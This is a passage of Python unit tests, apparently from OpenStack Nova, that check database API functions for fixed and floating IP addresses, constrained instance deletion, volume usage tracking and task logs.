fixed_ip = db.fixed_ip_get_by_address(self.ctxt, '1.2.3.4',
columns_to_join=['instance'])
self.assertIn('instance', fixed_ip.__dict__)
self.assertEqual(instance_uuid, fixed_ip.instance.uuid)
def test_fixed_ip_update_not_found_for_address(self):
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_update, self.ctxt,
'192.168.1.5', {})
def test_fixed_ip_update(self):
instance_uuid_1 = self._create_instance()
instance_uuid_2 = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
param_1 = {
'reserved': True, 'deleted': 0, 'leased': True,
'host': '192.168.133.1', 'address': '10.0.0.2',
'allocated': True, 'instance_uuid': instance_uuid_1,
'network_id': network_id_1, 'virtual_interface_id': '123',
}
param_2 = {
'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': '10.0.0.3', 'allocated': False,
'instance_uuid': instance_uuid_2, 'network_id': network_id_2,
'virtual_interface_id': None
}
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
fixed_ip_addr = db.fixed_ip_create(self.ctxt, param_1)['address']
db.fixed_ip_update(self.ctxt, fixed_ip_addr, param_2)
fixed_ip_after_update = db.fixed_ip_get_by_address(self.ctxt,
param_2['address'])
self._assertEqualObjects(param_2, fixed_ip_after_update, ignored_keys)
class FloatingIpTestCase(test.TestCase, ModelsObjectComparatorMixin):
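    """Tests for the floating_ip_* methods of the DB API."""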
def setUp(self):
super(FloatingIpTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'address': '1.1.1.1',
'fixed_ip_id': None,
'project_id': 'fake_project',
'host': 'fake_host',
'auto_assigned': False,
'pool': 'fake_pool',
'interface': 'fake_interface',
}
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def _create_floating_ip(self, values):
if not values:
values = {}
vals = self._get_base_values()
vals.update(values)
return db.floating_ip_create(self.ctxt, vals)
def test_floating_ip_get(self):
values = [{'address': '0.0.0.0'}, {'address': '1.1.1.1'}]
floating_ips = [self._create_floating_ip(val) for val in values]
for floating_ip in floating_ips:
real_floating_ip = db.floating_ip_get(self.ctxt, floating_ip['id'])
self._assertEqualObjects(floating_ip, real_floating_ip,
ignored_keys=['fixed_ip'])
def test_floating_ip_get_not_found(self):
self.assertRaises(exception.FloatingIpNotFound,
db.floating_ip_get, self.ctxt, 100500)
def test_floating_ip_get_with_long_id_not_found(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidID,
db.floating_ip_get, self.ctxt, 123456789101112)
def test_floating_ip_get_pools(self):
values = [
{'address': '0.0.0.0', 'pool': 'abc'},
{'address': '1.1.1.1', 'pool': 'abc'},
{'address': '2.2.2.2', 'pool': 'def'},
{'address': '3.3.3.3', 'pool': 'ghi'},
]
for val in values:
self._create_floating_ip(val)
expected_pools = [{'name': x}
for x in set(map(lambda x: x['pool'], values))]
real_pools = db.floating_ip_get_pools(self.ctxt)
self._assertEqualListsOfPrimitivesAsSets(real_pools, expected_pools)
def test_floating_ip_allocate_address(self):
pools = {
'pool1': ['0.0.0.0', '1.1.1.1'],
'pool2': ['2.2.2.2'],
'pool3': ['3.3.3.3', '4.4.4.4', '5.5.5.5']
}
for pool, addresses in pools.items():
for address in addresses:
vals = {'pool': pool, 'address': address, 'project_id': None}
self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
for pool, addresses in pools.items():
alloc_addrs = []
for i in addresses:
float_addr = db.floating_ip_allocate_address(self.ctxt,
project_id, pool)
alloc_addrs.append(float_addr)
self._assertEqualListsOfPrimitivesAsSets(alloc_addrs, addresses)
def test_floating_ip_allocate_auto_assigned(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
float_ips = []
for i in range(0, 2):
float_ips.append(self._create_floating_ip(
{"address": addresses[i]}))
for i in range(2, 4):
float_ips.append(self._create_floating_ip({"address": addresses[i],
"auto_assigned": True}))
for i in range(0, 2):
float_ip = db.floating_ip_get(self.ctxt, float_ips[i].id)
self.assertFalse(float_ip.auto_assigned)
for i in range(2, 4):
float_ip = db.floating_ip_get(self.ctxt, float_ips[i].id)
self.assertTrue(float_ip.auto_assigned)
def test_floating_ip_allocate_address_no_more_floating_ips(self):
self.assertRaises(exception.NoMoreFloatingIps,
db.floating_ip_allocate_address,
self.ctxt, 'any_project_id', 'no_such_pool')
def test_floating_ip_allocate_not_authorized(self):
ctxt = context.RequestContext(user_id='a', project_id='abc',
is_admin=False)
self.assertRaises(exception.Forbidden,
db.floating_ip_allocate_address,
ctxt, 'other_project_id', 'any_pool')
def test_floating_ip_allocate_address_succeeds_retry(self):
pool = 'pool0'
address = '0.0.0.0'
vals = {'pool': pool, 'address': address, 'project_id': None}
floating_ip = self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
def fake_first():
if mock_first.call_count == 1:
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 'invalid_id'}
else:
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 1}
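        # The first lookup returns a row with a bogus id, so the follow-up
        # UPDATE matches no rows and the allocation is retried; the second
        # lookup returns the real row and the retry succeeds.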
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
float_addr = db.floating_ip_allocate_address(self.ctxt,
project_id, pool)
self.assertEqual(address, float_addr)
self.assertEqual(2, mock_first.call_count)
float_ip = db.floating_ip_get(self.ctxt, floating_ip.id)
self.assertEqual(project_id, float_ip['project_id'])
def test_floating_ip_allocate_address_retry_limit_exceeded(self):
pool = 'pool0'
address = '0.0.0.0'
vals = {'pool': pool, 'address': address, 'project_id': None}
self._create_floating_ip(vals)
project_id = self._get_base_values()['project_id']
def fake_first():
return {'pool': pool, 'project_id': None, 'fixed_ip_id': None,
'address': address, 'id': 'invalid_id'}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FloatingIpAllocateFailed,
db.floating_ip_allocate_address, self.ctxt,
project_id, pool)
# 5 retries + initial attempt
self.assertEqual(6, mock_first.call_count)
def test_floating_ip_allocate_address_no_more_ips_with_no_retries(self):
with mock.patch('sqlalchemy.orm.query.Query.first',
return_value=None) as mock_first:
self.assertRaises(exception.NoMoreFloatingIps,
db.floating_ip_allocate_address,
self.ctxt, 'any_project_id', 'no_such_pool')
self.assertEqual(1, mock_first.call_count)
def _get_existing_ips(self):
return [ip['address'] for ip in db.floating_ip_get_all(self.ctxt)]
def test_floating_ip_bulk_create(self):
expected_ips = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
result = db.floating_ip_bulk_create(self.ctxt,
[{'address': x} for x in expected_ips],
want_result=False)
self.assertIsNone(result)
self._assertEqualListsOfPrimitivesAsSets(self._get_existing_ips(),
expected_ips)
def test_floating_ip_bulk_create_duplicate(self):
ips = ['1.1.1.1', '1.1.1.2', '1.1.1.3', '1.1.1.4']
prepare_ips = lambda x: {'address': x}
result = db.floating_ip_bulk_create(self.ctxt,
list(map(prepare_ips, ips)))
self.assertEqual(ips, [ip.address for ip in result])
self.assertRaises(exception.FloatingIpExists,
db.floating_ip_bulk_create,
self.ctxt,
list(map(prepare_ips, ['1.1.1.5', '1.1.1.4'])),
want_result=False)
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_get_by_address,
self.ctxt, '1.1.1.5')
def test_floating_ip_bulk_destroy(self):
ips_for_delete = []
ips_for_non_delete = []
def create_ips(i, j):
return [{'address': '1.1.%s.%s' % (i, k)} for k in range(1, j + 1)]
        # NOTE(boris-42): Create more than 256 ips to check that
        # _ip_range_splitter works properly.
for i in range(1, 3):
ips_for_delete.extend(create_ips(i, 255))
ips_for_non_delete.extend(create_ips(3, 255))
result = db.floating_ip_bulk_create(self.ctxt,
ips_for_delete + ips_for_non_delete,
want_result=False)
self.assertIsNone(result)
non_bulk_ips_for_delete = create_ips(4, 3)
non_bulk_ips_for_non_delete = create_ips(5, 3)
non_bulk_ips = non_bulk_ips_for_delete + non_bulk_ips_for_non_delete
project_id = 'fake_project'
reservations = quota.QUOTAS.reserve(self.ctxt,
floating_ips=len(non_bulk_ips),
project_id=project_id)
for dct in non_bulk_ips:
self._create_floating_ip(dct)
quota.QUOTAS.commit(self.ctxt, reservations, project_id=project_id)
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, project_id),
{'project_id': project_id,
'floating_ips': {'in_use': 6, 'reserved': 0}})
ips_for_delete.extend(non_bulk_ips_for_delete)
ips_for_non_delete.extend(non_bulk_ips_for_non_delete)
db.floating_ip_bulk_destroy(self.ctxt, ips_for_delete)
expected_addresses = [x['address'] for x in ips_for_non_delete]
self._assertEqualListsOfPrimitivesAsSets(self._get_existing_ips(),
expected_addresses)
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, project_id),
{'project_id': project_id,
'floating_ips': {'in_use': 3, 'reserved': 0}})
def test_floating_ip_create(self):
floating_ip = self._create_floating_ip({})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self.assertIsNotNone(floating_ip['id'])
self._assertEqualObjects(floating_ip, self._get_base_values(),
ignored_keys)
def test_floating_ip_create_duplicate(self):
self._create_floating_ip({})
self.assertRaises(exception.FloatingIpExists,
self._create_floating_ip, {})
def _create_fixed_ip(self, params):
default_params = {'address': '192.168.0.1'}
default_params.update(params)
return db.fixed_ip_create(self.ctxt, default_params)['address']
def test_floating_ip_fixed_ip_associate(self):
float_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
fixed_addresses = ['2.2.2.1', '2.2.2.2', '2.2.2.3']
project_id = self.ctxt.project_id
float_ips = [self._create_floating_ip({'address': address,
'project_id': project_id})
for address in float_addresses]
fixed_addrs = [self._create_fixed_ip({'address': address})
for address in fixed_addresses]
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
fixed_ip = db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_addr, 'host')
self.assertEqual(fixed_ip.address, fixed_addr)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertEqual(fixed_ip.id, updated_float_ip.fixed_ip_id)
self.assertEqual('host', updated_float_ip.host)
fixed_ip = db.floating_ip_fixed_ip_associate(self.ctxt,
float_addresses[0],
fixed_addresses[0],
'host')
self.assertEqual(fixed_ip.address, fixed_addresses[0])
def test_floating_ip_fixed_ip_associate_float_ip_not_found(self):
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.floating_ip_fixed_ip_associate,
self.ctxt, '10.10.10.10', 'some', 'some')
def test_floating_ip_associate_failed(self):
fixed_ip = self._create_fixed_ip({'address': '7.7.7.7'})
self.assertRaises(exception.FloatingIpAssociateFailed,
db.floating_ip_fixed_ip_associate,
self.ctxt, '10.10.10.10', fixed_ip, 'some')
def test_floating_ip_deallocate(self):
values = {'address': '1.1.1.1', 'project_id': 'fake', 'host': 'fake'}
float_ip = self._create_floating_ip(values)
rows_updated = db.floating_ip_deallocate(self.ctxt, float_ip.address)
self.assertEqual(1, rows_updated)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertIsNone(updated_float_ip.project_id)
self.assertIsNone(updated_float_ip.host)
self.assertFalse(updated_float_ip.auto_assigned)
def test_floating_ip_deallocate_address_not_found(self):
self.assertEqual(0, db.floating_ip_deallocate(self.ctxt, '2.2.2.2'))
def test_floating_ip_deallocate_address_associated_ip(self):
float_address = '1.1.1.1'
fixed_address = '2.2.2.1'
project_id = self.ctxt.project_id
float_ip = self._create_floating_ip({'address': float_address,
'project_id': project_id})
fixed_addr = self._create_fixed_ip({'address': fixed_address})
db.floating_ip_fixed_ip_associate(self.ctxt, float_ip.address,
fixed_addr, 'host')
self.assertEqual(0, db.floating_ip_deallocate(self.ctxt,
float_address))
def test_floating_ip_destroy(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
expected_len = len(addresses)
for float_ip in float_ips:
db.floating_ip_destroy(self.ctxt, float_ip.address)
self.assertRaises(exception.FloatingIpNotFound,
db.floating_ip_get, self.ctxt, float_ip.id)
expected_len -= 1
if expected_len > 0:
self.assertEqual(expected_len,
len(db.floating_ip_get_all(self.ctxt)))
else:
self.assertRaises(exception.NoFloatingIpsDefined,
db.floating_ip_get_all, self.ctxt)
def test_floating_ip_disassociate(self):
float_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
fixed_addresses = ['2.2.2.1', '2.2.2.2', '2.2.2.3']
project_id = self.ctxt.project_id
float_ips = [self._create_floating_ip({'address': address,
'project_id': project_id})
for address in float_addresses]
fixed_addrs = [self._create_fixed_ip({'address': address})
for address in fixed_addresses]
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_addr, 'host')
for float_ip, fixed_addr in zip(float_ips, fixed_addrs):
fixed = db.floating_ip_disassociate(self.ctxt, float_ip.address)
self.assertEqual(fixed.address, fixed_addr)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip.id)
self.assertIsNone(updated_float_ip.fixed_ip_id)
self.assertIsNone(updated_float_ip.host)
def test_floating_ip_disassociate_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_disassociate, self.ctxt,
'11.11.11.11')
def test_floating_ip_get_all(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
self._assertEqualListsOfObjects(float_ips,
db.floating_ip_get_all(self.ctxt),
ignored_keys="fixed_ip")
def test_floating_ip_get_all_associated(self):
instance = db.instance_create(self.ctxt, {'uuid': 'fake'})
project_id = self.ctxt.project_id
float_ip = self._create_floating_ip({'address': '1.1.1.1',
'project_id': project_id})
fixed_ip = self._create_fixed_ip({'address': '2.2.2.2',
'instance_uuid': instance.uuid})
db.floating_ip_fixed_ip_associate(self.ctxt,
float_ip.address,
fixed_ip,
'host')
float_ips = db.floating_ip_get_all(self.ctxt)
self.assertEqual(1, len(float_ips))
self.assertEqual(float_ip.address, float_ips[0].address)
self.assertEqual(fixed_ip, float_ips[0].fixed_ip.address)
self.assertEqual(instance.uuid, float_ips[0].fixed_ip.instance_uuid)
def test_floating_ip_get_all_not_found(self):
self.assertRaises(exception.NoFloatingIpsDefined,
db.floating_ip_get_all, self.ctxt)
def test_floating_ip_get_all_by_host(self):
hosts = {
'host1': ['1.1.1.1', '1.1.1.2'],
'host2': ['2.1.1.1', '2.1.1.2'],
'host3': ['3.1.1.1', '3.1.1.2', '3.1.1.3']
}
hosts_with_float_ips = {}
for host, addresses in hosts.items():
hosts_with_float_ips[host] = []
for address in addresses:
float_ip = self._create_floating_ip({'host': host,
'address': address})
hosts_with_float_ips[host].append(float_ip)
for host, float_ips in hosts_with_float_ips.items():
real_float_ips = db.floating_ip_get_all_by_host(self.ctxt, host)
self._assertEqualListsOfObjects(float_ips, real_float_ips,
ignored_keys="fixed_ip")
def test_floating_ip_get_all_by_host_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForHost,
db.floating_ip_get_all_by_host,
self.ctxt, 'non_exists_host')
def test_floating_ip_get_all_by_project(self):
projects = {
'pr1': ['1.1.1.1', '1.1.1.2'],
'pr2': ['2.1.1.1', '2.1.1.2'],
'pr3': ['3.1.1.1', '3.1.1.2', '3.1.1.3']
}
projects_with_float_ips = {}
for project_id, addresses in projects.items():
projects_with_float_ips[project_id] = []
for address in addresses:
float_ip = self._create_floating_ip({'project_id': project_id,
'address': address})
projects_with_float_ips[project_id].append(float_ip)
for project_id, float_ips in projects_with_float_ips.items():
real_float_ips = db.floating_ip_get_all_by_project(self.ctxt,
project_id)
self._assertEqualListsOfObjects(float_ips, real_float_ips,
ignored_keys='fixed_ip')
def test_floating_ip_get_all_by_project_not_authorized(self):
ctxt = context.RequestContext(user_id='a', project_id='abc',
is_admin=False)
self.assertRaises(exception.Forbidden,
db.floating_ip_get_all_by_project,
ctxt, 'other_project')
def test_floating_ip_get_by_address(self):
addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_ips = [self._create_floating_ip({'address': addr})
for addr in addresses]
for float_ip in float_ips:
real_float_ip = db.floating_ip_get_by_address(self.ctxt,
float_ip.address)
self._assertEqualObjects(float_ip, real_float_ip,
ignored_keys='fixed_ip')
def test_floating_ip_get_by_address_not_found(self):
self.assertRaises(exception.FloatingIpNotFoundForAddress,
db.floating_ip_get_by_address,
self.ctxt, '20.20.20.20')
def test_floating_ip_get_by_invalid_address(self):
self.mock_db_query_first_to_raise_data_error_exception()
self.assertRaises(exception.InvalidIpAddressError,
db.floating_ip_get_by_address,
self.ctxt, 'non_exists_host')
def test_floating_ip_get_by_fixed_address(self):
fixed_float = [
('1.1.1.1', '2.2.2.1'),
('1.1.1.2', '2.2.2.2'),
('1.1.1.3', '2.2.2.3')
]
for fixed_addr, float_addr in fixed_float:
project_id = self.ctxt.project_id
self._create_floating_ip({'address': float_addr,
'project_id': project_id})
self._create_fixed_ip({'address': fixed_addr})
db.floating_ip_fixed_ip_associate(self.ctxt, float_addr,
fixed_addr, 'some_host')
for fixed_addr, float_addr in fixed_float:
float_ip = db.floating_ip_get_by_fixed_address(self.ctxt,
fixed_addr)
self.assertEqual(float_addr, float_ip[0]['address'])
def test_floating_ip_get_by_fixed_ip_id(self):
fixed_float = [
('1.1.1.1', '2.2.2.1'),
('1.1.1.2', '2.2.2.2'),
('1.1.1.3', '2.2.2.3')
]
for fixed_addr, float_addr in fixed_float:
project_id = self.ctxt.project_id
self._create_floating_ip({'address': float_addr,
'project_id': project_id})
self._create_fixed_ip({'address': fixed_addr})
db.floating_ip_fixed_ip_associate(self.ctxt, float_addr,
fixed_addr, 'some_host')
for fixed_addr, float_addr in fixed_float:
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, fixed_addr)
float_ip = db.floating_ip_get_by_fixed_ip_id(self.ctxt,
fixed_ip['id'])
self.assertEqual(float_addr, float_ip[0]['address'])
def test_floating_ip_update(self):
float_ip = self._create_floating_ip({})
values = {
'project_id': 'some_pr',
'host': 'some_host',
'auto_assigned': True,
'interface': 'some_interface',
'pool': 'some_pool'
}
floating_ref = db.floating_ip_update(self.ctxt, float_ip['address'],
values)
self.assertIsNotNone(floating_ref)
updated_float_ip = db.floating_ip_get(self.ctxt, float_ip['id'])
self._assertEqualObjects(updated_float_ip, values,
ignored_keys=['id', 'address', 'updated_at',
'deleted_at', 'created_at',
'deleted', 'fixed_ip_id',
'fixed_ip'])
def test_floating_ip_update_to_duplicate(self):
float_ip1 = self._create_floating_ip({'address': '1.1.1.1'})
float_ip2 = self._create_floating_ip({'address': '1.1.1.2'})
self.assertRaises(exception.FloatingIpExists,
db.floating_ip_update,
self.ctxt, float_ip2['address'],
{'address': float_ip1['address']})
class InstanceDestroyConstraints(test.TestCase):
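    """Tests for db.api.instance_destroy() with equal_any/not_equal constraints."""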
def test_destroy_with_equal_any_constraint_met_single_value(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.equal_any('deleting'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_equal_any_constraint_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.equal_any('deleting',
'error'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_equal_any_constraint_not_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'vm_state': 'resize'})
constraint = db.constraint(vm_state=db.equal_any('active', 'error'))
self.assertRaises(exception.ConstraintNotMet, db.instance_destroy,
ctx, instance['uuid'], constraint)
instance = db.instance_get_by_uuid(ctx, instance['uuid'])
self.assertFalse(instance['deleted'])
def test_destroy_with_not_equal_constraint_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'task_state': 'deleting'})
constraint = db.constraint(task_state=db.not_equal('error', 'resize'))
db.instance_destroy(ctx, instance['uuid'], constraint)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
ctx, instance['uuid'])
def test_destroy_with_not_equal_constraint_not_met(self):
ctx = context.get_admin_context()
instance = db.instance_create(ctx, {'vm_state': 'active'})
constraint = db.constraint(vm_state=db.not_equal('active', 'error'))
self.assertRaises(exception.ConstraintNotMet, db.instance_destroy,
ctx, instance['uuid'], constraint)
instance = db.instance_get_by_uuid(ctx, instance['uuid'])
self.assertFalse(instance['deleted'])
class VolumeUsageDBApiTestCase(test.TestCase):
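    """Tests for db.api.vol_usage_update and db.api.vol_get_usage_by_time."""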
def setUp(self):
super(VolumeUsageDBApiTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
self.useFixture(test.TimeOverride())
def test_vol_usage_update_no_totals_update(self):
ctxt = context.get_admin_context()
now = timeutils.utcnow()
timeutils.set_time_override(now)
start_time = now - datetime.timedelta(seconds=10)
expected_vol_usages = {
u'1': {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'user_id': 'fake-user-uuid1',
'curr_reads': 1000,
'curr_read_bytes': 2000,
'curr_writes': 3000,
'curr_write_bytes': 4000,
'curr_last_refreshed': now,
'tot_reads': 0,
'tot_read_bytes': 0,
'tot_writes': 0,
'tot_write_bytes': 0,
'tot_last_refreshed': None},
u'2': {'volume_id': u'2',
'instance_uuid': 'fake-instance-uuid2',
'project_id': 'fake-project-uuid2',
'user_id': 'fake-user-uuid2',
'curr_reads': 100,
'curr_read_bytes': 200,
'curr_writes': 300,
'curr_write_bytes': 400,
'tot_reads': 0,
'tot_read_bytes': 0,
'tot_writes': 0,
'tot_write_bytes': 0,
'tot_last_refreshed': None}
}
def _compare(vol_usage, expected):
for key, value in expected.items():
self.assertEqual(vol_usage[key], value)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1', rd_req=10, rd_bytes=20,
wr_req=30, wr_bytes=40,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
user_id='fake-user-uuid1',
availability_zone='fake-az')
db.vol_usage_update(ctxt, u'2', rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid2',
project_id='fake-project-uuid2',
user_id='fake-user-uuid2',
availability_zone='fake-az')
db.vol_usage_update(ctxt, u'1', rd_req=1000, rd_bytes=2000,
wr_req=3000, wr_bytes=4000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
user_id='fake-user-uuid1',
availability_zone='fake-az')
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 2)
for usage in vol_usages:
_compare(usage, expected_vol_usages[usage.volume_id])
def test_vol_usage_update_totals_update(self):
ctxt = context.get_admin_context()
now = datetime.datetime(1, 1, 1, 1, 0, 0)
start_time = now - datetime.timedelta(seconds=10)
now1 = now + datetime.timedelta(minutes=1)
now2 = now + datetime.timedelta(minutes=2)
now3 = now + datetime.timedelta(minutes=3)
timeutils.set_time_override(now)
db.vol_usage_update(ctxt, u'1', rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az')
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 0)
self.assertEqual(current_usage['curr_reads'], 100)
timeutils.set_time_override(now1)
db.vol_usage_update(ctxt, u'1', rd_req=200, rd_bytes=300,
wr_req=400, wr_bytes=500,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az',
update_totals=True)
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 200)
self.assertEqual(current_usage['curr_reads'], 0)
timeutils.set_time_override(now2)
db.vol_usage_update(ctxt, u'1', rd_req=300, rd_bytes=400,
wr_req=500, wr_bytes=600,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
availability_zone='fake-az',
user_id='fake-user-uuid')
current_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
self.assertEqual(current_usage['tot_reads'], 200)
self.assertEqual(current_usage['curr_reads'], 300)
timeutils.set_time_override(now3)
db.vol_usage_update(ctxt, u'1', rd_req=400, rd_bytes=500,
wr_req=600, wr_bytes=700,
instance_id='fake-instance-uuid',
project_id='fake-project-uuid',
user_id='fake-user-uuid',
availability_zone='fake-az',
update_totals=True)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
expected_vol_usages = {'volume_id': u'1',
'project_id': 'fake-project-uuid',
'user_id': 'fake-user-uuid',
'instance_uuid': 'fake-instance-uuid',
'availability_zone': 'fake-az',
'tot_reads': 600,
'tot_read_bytes': 800,
'tot_writes': 1000,
'tot_write_bytes': 1200,
'tot_last_refreshed': now3,
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'curr_last_refreshed': now2}
self.assertEqual(1, len(vol_usages))
for key, value in expected_vol_usages.items():
self.assertEqual(vol_usages[0][key], value, key)
def test_vol_usage_update_when_blockdevicestats_reset(self):
ctxt = context.get_admin_context()
now = timeutils.utcnow()
start_time = now - datetime.timedelta(seconds=10)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1',
rd_req=10000, rd_bytes=20000,
wr_req=30000, wr_bytes=40000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
        # Instance rebooted or crashed. Block device stats were reset and are
        # less than the previous values.
db.vol_usage_update(ctxt, u'1',
rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
db.vol_usage_update(ctxt, u'1',
rd_req=200, rd_bytes=300,
wr_req=400, wr_bytes=500,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
vol_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
expected_vol_usage = {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'availability_zone': 'fake-az',
'user_id': 'fake-user-uuid1',
'curr_reads': 200,
'curr_read_bytes': 300,
'curr_writes': 400,
'curr_write_bytes': 500,
'tot_reads': 10000,
'tot_read_bytes': 20000,
'tot_writes': 30000,
'tot_write_bytes': 40000}
for key, value in expected_vol_usage.items():
self.assertEqual(vol_usage[key], value, key)
def test_vol_usage_update_totals_update_when_blockdevicestats_reset(self):
# This is unlikely to happen, but could when a volume is detached
        # right after an instance has rebooted / recovered and before
# the system polled and updated the volume usage cache table.
ctxt = context.get_admin_context()
now = timeutils.utcnow()
start_time = now - datetime.timedelta(seconds=10)
vol_usages = db.vol_get_usage_by_time(ctxt, start_time)
self.assertEqual(len(vol_usages), 0)
db.vol_usage_update(ctxt, u'1',
rd_req=10000, rd_bytes=20000,
wr_req=30000, wr_bytes=40000,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1')
        # Instance rebooted or crashed. Block device stats were reset and are
        # less than the previous values.
db.vol_usage_update(ctxt, u'1',
rd_req=100, rd_bytes=200,
wr_req=300, wr_bytes=400,
instance_id='fake-instance-uuid1',
project_id='fake-project-uuid1',
availability_zone='fake-az',
user_id='fake-user-uuid1',
update_totals=True)
vol_usage = db.vol_get_usage_by_time(ctxt, start_time)[0]
expected_vol_usage = {'volume_id': u'1',
'instance_uuid': 'fake-instance-uuid1',
'project_id': 'fake-project-uuid1',
'availability_zone': 'fake-az',
'user_id': 'fake-user-uuid1',
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'tot_reads': 10100,
'tot_read_bytes': 20200,
'tot_writes': 30300,
'tot_write_bytes': 40400}
for key, value in expected_vol_usage.items():
self.assertEqual(vol_usage[key], value, key)
class TaskLogTestCase(test.TestCase):
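    """Tests for db.api.task_log_* methods."""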
def setUp(self):
super(TaskLogTestCase, self).setUp()
self.context = context.get_admin_context()
now = timeutils.utcnow()
self.begin = timeutils.strtime(now - datetime.timedelta(seconds=10))
self.end = timeutils.strtime(now - datetime.timedelta(seconds=5))
self.task_name = 'fake-task-name'
self.host = 'fake-host'
self.message = 'Fake task message'
db.task_log_begin_task(self.context, self.task_name, self.begin,
self.end, self.host, message=self.message)
def test_task_log_get(self):
result = db.task_log_get(self.context, self.task_name, self.begin,
self.end, self.host)
self.assertEqual(result['task_name'], self.task_name)
self.assertEqual(result['period_beginning'],
timeutils.parse_strtime(self.begin))
self.assertEqual(result['period_ending'],
timeutils.parse_strtime(self.end))
self.assertEqual(result['host'], self.host)
self.assertEqual(result['message'], self.message)
def test_task_log_get_all(self):
result = db.task_log_get_all(self.context, self.task_name, self.begin,
self.end, host=self.host)
self.assertEqual(len(result), 1)
result = db.task_log_get_all(self.context, self.task_name, self.begin,
self.end, host=self.host, state='')
self.assertEqual(len(result), 0)
